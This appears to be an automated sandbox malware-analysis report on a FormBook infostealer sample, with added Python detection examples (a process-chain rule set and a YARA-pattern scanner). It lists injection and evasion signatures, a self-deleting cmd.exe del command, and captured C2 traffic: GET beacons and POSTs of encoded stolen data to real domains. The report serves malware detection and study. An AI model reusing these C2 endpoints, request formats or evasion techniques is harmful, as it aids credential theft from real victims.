
Analysis Report Doc11.exe

Overview

General Information

Sample Name: Doc11.exe
Analysis ID: 288546
MD5: f7ad3b59548788a59172b6477a1b83f0
SHA1: 3b042b49ac135f38824de3665a051a7631e98782
SHA256: f22a0b5b12687ae12b9f4d625d82a16562bce5e1b03b7d7372df3813e5afc8e5
Tags: FormBook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Doc11.exe (PID: 4936 cmdline: 'C:\Users\user\Desktop\Doc11.exe' MD5: F7AD3B59548788A59172B6477A1B83F0)
    • RegAsm.exe (PID: 5836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 5948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4464 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 5952 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
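The tree above is the kind of chain process-creation telemetry can catch even though, as the Sigma section of this report notes, no shipped Sigma rule matched the run. The following Python is an added example written for this page, not Joe Sandbox output and not a published rule: it encodes three observations from the tree (RegAsm.exe launched with no arguments by a process outside C:\Windows, cscript.exe launched with no script by explorer.exe, and cmd.exe /c del of the .NET Framework RegAsm.exe binary) as rules over constructed Sysmon/4688-style events. PIDs and command lines are taken from the tree; the explorer.exe and cmd.exe image paths and the parent PID of 0 for root processes are assumptions. The explorer.exe edge in the report's tree comes from injection (see "Writes to foreign memory regions"), which creation events alone do not show, so it is deliberately not modelled as a parent link here.

```python
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


FRAMEWORK_DIR = r"c:\windows\microsoft.net\framework"


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _has_args(ev: ProcEvent) -> bool:
    """True when the command line carries anything beyond the image path itself."""
    cmd = ev.cmdline.strip().strip('"').strip("'").lower()
    return cmd not in ("", ev.image.lower())


def regasm_without_args(ev: ProcEvent, by_pid: dict) -> bool:
    """RegAsm.exe normally receives an assembly path. An argument-less launch whose
    parent lives outside C:\\Windows is the Doc11.exe -> RegAsm.exe step of the tree."""
    if _name(ev.image) != "regasm.exe" or _has_args(ev):
        return False
    parent = by_pid.get(ev.ppid)
    return parent is not None and not parent.image.lower().startswith("c:\\windows\\")


def cscript_without_script(ev: ProcEvent, by_pid: dict) -> bool:
    """cscript.exe started by explorer.exe with no script to run."""
    if _name(ev.image) != "cscript.exe" or _has_args(ev):
        return False
    parent = by_pid.get(ev.ppid)
    return parent is not None and _name(parent.image) == "explorer.exe"


def cmd_deletes_framework_binary(ev: ProcEvent, by_pid: dict) -> bool:
    """cmd.exe /c del <file under the .NET Framework directory>."""
    cmd = ev.cmdline.lower()
    return _name(ev.image) == "cmd.exe" and "/c" in cmd and " del " in cmd and FRAMEWORK_DIR in cmd


RULES = [
    ("regasm_no_args", regasm_without_args),
    ("cscript_no_script", cscript_without_script),
    ("cmd_del_framework_binary", cmd_deletes_framework_binary),
]


def evaluate(events) -> list:
    """Return [(rule_name, pid), ...] for every event that trips a rule, in event order."""
    by_pid = {e.pid: e for e in events}
    return [(name, e.pid) for e in events for name, rule in RULES if rule(e, by_pid)]


REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed from the Startup tree of this report. explorer.exe (3384) gets ppid 0:
# the tree shows it under RegAsm.exe because of injection, not process creation.
# The explorer.exe and cmd.exe image paths are assumed, not taken from the report.
EVENTS = [
    ProcEvent(4936, 0, r"C:\Users\user\Desktop\Doc11.exe", r"'C:\Users\user\Desktop\Doc11.exe'"),
    ProcEvent(5836, 4936, REGASM, REGASM),
    ProcEvent(5948, 4936, REGASM, REGASM),
    ProcEvent(3384, 0, r"C:\Windows\explorer.exe", ""),
    ProcEvent(4464, 3384, r"C:\Windows\SysWOW64\cscript.exe", r"C:\Windows\SysWOW64\cscript.exe"),
    ProcEvent(5952, 4464, r"C:\Windows\SysWOW64\cmd.exe", "/c del '" + REGASM + "'"),
    ProcEvent(5708, 5952, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Constructed benign control: a build tool registering a COM assembly with arguments.
BENIGN = [
    ProcEvent(100, 0, r"C:\Program Files\Example\build.exe", r"C:\Program Files\Example\build.exe"),
    ProcEvent(101, 100, REGASM, REGASM + r" /codebase C:\build\MyLib.dll"),
]

if __name__ == "__main__":
    for name, pid in evaluate(EVENTS):
        print(f"{name}: pid {pid}")
```

Running it against the constructed tree flags both RegAsm.exe instances, the cscript.exe child of explorer.exe and the cmd.exe deletion, while the benign RegAsm invocation with an assembly argument produces nothing.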

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed under each rule)

00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0xc4a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xc712:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x18245:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x17d31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x18347:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x184bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xd12a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x16fac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xde23:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1de37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 further memory-dump entries are not shown in this view)

      Unpacked PEs

Source | Rule | Description | Author (matched strings listed under each rule)

2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.RegAsm.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.RegAsm.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further unpacked-PE entries are not shown in this view)
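The two community rules above match on short byte sequences, which is enough to rebuild the check and see what each sequence is. The three JPCERT/CC strings are `push imm32` instructions; the rule author names the constants after the sqlite3 step/text/blob routines, and since FormBook resolves APIs by hash, a pushed constant rather than an import name is what survives in memory (this is the code path behind "Tries to harvest and steal browser information"). `$sequence_0` of the yara-signator rule decodes to `add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax`, the RDTSC timing check the signature list reports. The Python below is an added example written for this page, not the rules' own code or a Joe Sandbox component: it compiles such hex strings into byte regexes (generalised to YARA's `??` wildcards and `[n-m]` jumps), scans a constructed buffer and applies the JPCERT rule's condition, which is assumed here to be "all of them".

```python
import re

# Hex strings copied from the two rules matched in this report. Comments give the x86 decoding.
PATTERNS = {
    "sqlite3step": "68 34 1C 7B E1",              # push 0xE17B1C34
    "sqlite3text": "68 38 2A 90 C5",              # push 0xC5902A38
    "sqlite3blob": "68 53 D8 7F 8C",              # push 0x8C7FD853
    "sequence_0":  "03 C8 0F 31 2B C1 89 45 FC",  # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
}


def hex_to_regex(pattern: str) -> re.Pattern:
    """Compile a YARA-style hex string into a bytes regex.
    Handles fixed bytes, '??' single-byte wildcards and [n] / [n-m] byte jumps."""
    parts = []
    for tok in pattern.split():
        if tok == "??":
            parts.append(b".")
        elif tok.startswith("[") and tok.endswith("]"):
            lo, _, hi = tok[1:-1].partition("-")
            parts.append(b".{%d,%d}" % (int(lo), int(hi or lo)))
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf: bytes, patterns: dict = PATTERNS) -> dict:
    """Return {name: [offset, ...]} for every pattern with at least one hit in buf."""
    hits = {}
    for name, pat in patterns.items():
        offsets = [m.start() for m in hex_to_regex(pat).finditer(buf)]
        if offsets:
            hits[name] = offsets
    return hits


def jpcert_formbook_condition(hits: dict) -> bool:
    """Assumed condition of the JPCERT 'Formbook' rule: all three sqlite3 hash pushes present."""
    return all(k in hits for k in ("sqlite3step", "sqlite3text", "sqlite3blob"))


def build_sample() -> bytes:
    """Constructed test buffer, not a dump from this report: filler bytes with the four
    sequences embedded at offsets 16, 29, 37 and 47."""
    return (b"\x90" * 16
            + bytes.fromhex("68341C7BE1") + b"\x00" * 8
            + bytes.fromhex("68382A90C5") + b"\x00" * 3
            + bytes.fromhex("6853D87F8C") + b"\xCC" * 5
            + bytes.fromhex("03C80F312BC18945FC"))


if __name__ == "__main__":
    found = scan(build_sample())
    for name, offsets in found.items():
        print(name, [hex(o) for o in offsets])
    print("JPCERT Formbook condition:", jpcert_formbook_condition(found))
```

The same `scan` works on a raw memory dump read from disk; offsets then line up with the per-rule offsets the report prints, modulo the dump's base address.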

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Doc11.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: Doc11.exe | Virustotal: Detection: 34%
Source: Doc11.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Doc11.exe | Joe Sandbox ML: detected
Source: 2.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Doc11.exe.6320000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi
Source: global traffic | HTTP traffic detected:
  GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1
  Host: www.chelsescompass.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected:
  GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1
  Host: www.snacklabbet.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: Joe Sandbox View | ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View | ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: global traffic | HTTP traffic detected:
  POST /dfc/ HTTP/1.1
  Host: www.snacklabbet.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.snacklabbet.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.snacklabbet.com/dfc/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 44 38 50 3d 31 75 37 45 34 50 42 42 39 56 61 63 36 2d 48 6c 56 36 31 62 6e 54 5a 67 56 78 57 57 59 6c 68 66 63 74 68 32 77 49 38 63 47 53 28 31 49 6b 5a 77 77 52 50 31 54 53 4d 45 52 64 43 35 74 35 36 52 57 59 66 64 67 6a 65 30 6c 73 78 76 34 55 31 6e 44 2d 63 4b 43 44 52 46 55 31 47 34 65 52 4f 43 4d 43 31 6b 4a 76 45 4f 53 4a 43 39 4f 75 38 51 7a 62 45 33 32 70 4b 32 6d 34 48 77 63 57 4e 4f 65 49 7a 75 48 39 69 6b 73 74 4f 72 78 4f 59 74 76 5a 72 38 34 50 70 49 78 74 72 55 6b 7a 65 72 53 64 57 4d 34 49 56 65 48 64 33 73 4b 65 65 4e 51 53 61 77 68 79 50 70 38 75 75 71 7e 49 49 78 38 35 4e 5f 53 6e 37 52 52 4b 67 56 28 6f 7e 38 49 4e 70 41 50 41 4b 62 6b 51 55 33 4f 37 43 42 46 77 4d 57 74 43 63 70 53 39 6e 44 47 5a 32 6f 33 72 41 6c 34 78 4a 30 55 35 6f 7a 49 76 31 59 5a 45 7e 61 63 5f 56 5a 67 34 61 5f 56 72 54 35 62 61 72 69 6f 37 7e 73 47 58 48 78 70 41 57 6c 59 4e 41 74 34 7a 67 5f 45 6f 61 61 35 4e 72 2d 6e 74 38 68 4f 6a 62 6f 42 78 6e 30 55 41 46 46 59 52 73 55 51 6e 44 61 4e 55 32 4b 4d 4e 43 71 5a 36 64 54 45 36 66 6a 58 6c 64 4a 74 33 33 48 47 48 50 49 64 55 53 41 62 51 52 6d 75 74 51 71 46 53 33 6b 58 6b 73 36 57 66 30 51 55 39 57 76 28 41 28 44 4f 57 51 6e 6f 5f 53 6e 6e 76 30 38 79 77 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw).
Source: global traffic | HTTP traffic detected:
  POST /dfc/ HTTP/1.1
  Host: www.snacklabbet.com
  Connection: close
  Content-Length: 185341
  Cache-Control: no-cache
  Origin: http://www.snacklabbet.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.snacklabbet.com/dfc/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 44 38 50 3d 31 75 37 45 34 4c 38 34 75 46 58 45 77 73 6a 6d 48 36 6c 54 32 43 6f 2d 52 7a 53 46 4a 33 42 74 56 61 78 6d 77 4a 73 59 4b 7a 76 6a 66 30 4a 77 32 53 6e 75 55 79 4d 48 41 4e 43 6d 36 4a 7e 74 4b 34 48 56 67 6d 6e 54 6c 73 70 73 68 43 59 74 43 75 64 54 44 6a 74 58 57 31 53 64 65 54 36 33 4d 6b 74 4b 66 66 41 4f 66 5a 4b 5f 43 76 73 4c 36 5f 55 47 6f 4b 75 33 6b 39 54 70 66 6d 67 35 63 71 50 32 50 66 47 71 39 75 53 65 76 66 6f 42 6c 6f 7a 33 32 5f 74 4c 74 65 57 51 38 30 4f 6e 54 65 4f 36 37 4e 35 64 4b 4e 76 69 4e 63 48 6e 56 6d 69 4a 6e 68 57 59 38 76 33 53 6c 70 30 64 75 4c 70 4e 51 53 54 6f 44 59 51 58 37 62 48 68 4d 4c 55 32 66 77 61 30 38 68 6b 73 59 34 47 55 41 31 49 47 6e 44 55 34 55 4d 72 78 53 62 75 63 30 34 74 6f 33 56 4e 62 41 71 4a 7a 47 65 55 62 4e 6e 54 35 52 5f 55 51 69 34 61 72 65 49 61 4f 63 72 76 39 76 36 50 4d 46 51 6a 63 73 41 79 41 56 72 41 70 32 79 6f 69 42 59 57 57 32 65 44 73 6a 50 77 71 49 51 48 75 66 42 6e 6e 55 43 74 61 59 52 73 32 51 69 28 67 4e 6c 53 4b 4e 59 4f 44 61 62 64 50 43 36 65 68 52 30 74 48 6d 6c 6a 75 47 48 58 49 50 55 44 49 5a 6e 74 6d 6b 66 49 72 46 32 62 6b 62 30 73 36 5a 5f 31 53 59 6f 6d 71 7a 43 4b 4d 45 6b 68 67 38 71 50 71 6c 2d 64 6d 6c 44 54 76 6c 73 48 7a 6b 37 44 73 6c 4b 35 65 64 6f 6a 4d 53 39 4e 73 5a 53 76 67 78 6f 51 38 7a 5a 65 77 68 39 74 34 76 4b 58 46 31 4d 76 74 6c 6b 35 36 28 4b 41 35 36 70 61 55 54 37 32 4b 44 6c 50 47 41 42 79 31 62 39 30 56 38 73 6e 6e 65 39 7e 6e 36 66 28 41 75 58 28 4f 57 69 68 5f 4d 37 66 73 47 6b 7a 4d 4a 6c 73 74 77 4c 6d 5a 66 49 61 67 4c 71 6c 4b 62 4c 7e 4b 63 48 6a 69 62 75 51 4f 4e 55 74 37 30 36 6f 41 45 73 4e 51 34 69 48 53 30 2d 62 51 28 37 56 44 62 42 35 4d 4a 4e 6d 78 70 58 47 48 55 66 6b 65 4a 75 67 62 51 46 58 49 7a 30 51 4d 6e 63 49 31 52 75 69 59 76 36 65 76 6f 70 54 35 51 52 52 30 48 2d 44 43 50 42 67 65 62 34 30 7a 62 79 50 4f 37 47 78 75 4d 43 48 69 41 35 4c 53 39 37 43 72 30 67 4d 42 7a 55 4e 71 67 31 4e 42 52 53 48 62 7e 68 28 56 63 68 7e 2d 76 37 30 36 7e 39 68 65 6c 48 6b 62 61 77 7e 65 6e 33 6f 2d 57 5a 63 4a 73 47 63 72 4b 48 67 67 68 55 74 44 33 35 47 53 7e 5f 4e 53 54 65 68 5a 72 51 68 7a 32 4f 38 30 68 61 57 37 69 62 53 71 52 43 61 51 64 69 55 64 76 71 5a 4a 6a 78 4e 4c 76 6a 47 4d 4f 36 71 4a 47 70 63 4a 52 63 69 77 30 6f 30 77 46 6c 52 6b 43 38 36 5f 67 4f 65 32 68 57 76 57 79 34 4b 4e 54 72 4d 56 6c 5a 36 6f 41 78 7e 6f 5a 66 34 58 6b 39 38 58 62 73 45 6e 47 67 4b 47 55 4d 65 5a 50 46 63 4d 38 5f 53 70 78 49 42 6f 31 6d 56 6b 66 61 68 79 36 4f 58 30 68 6a 30 68 38 41 77 31 64 43 4b 36 6c 6f 54 67 4f 4e 51 64 7e 64 6b 7
Source: unknown | DNS traffic detected: queries for: www.chelsescompass.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: cscript.exe, 00000006.00000002.445011473.0000000005269000.00000004.00000001.sdmp | String found in binary or memory: http://www.snacklabbet.com
Source: cscript.exe, 00000006.00000002.445011473.0000000005269000.00000004.00000001.sdmp | String found in binary or memory: http://www.snacklabbet.com/dfc/
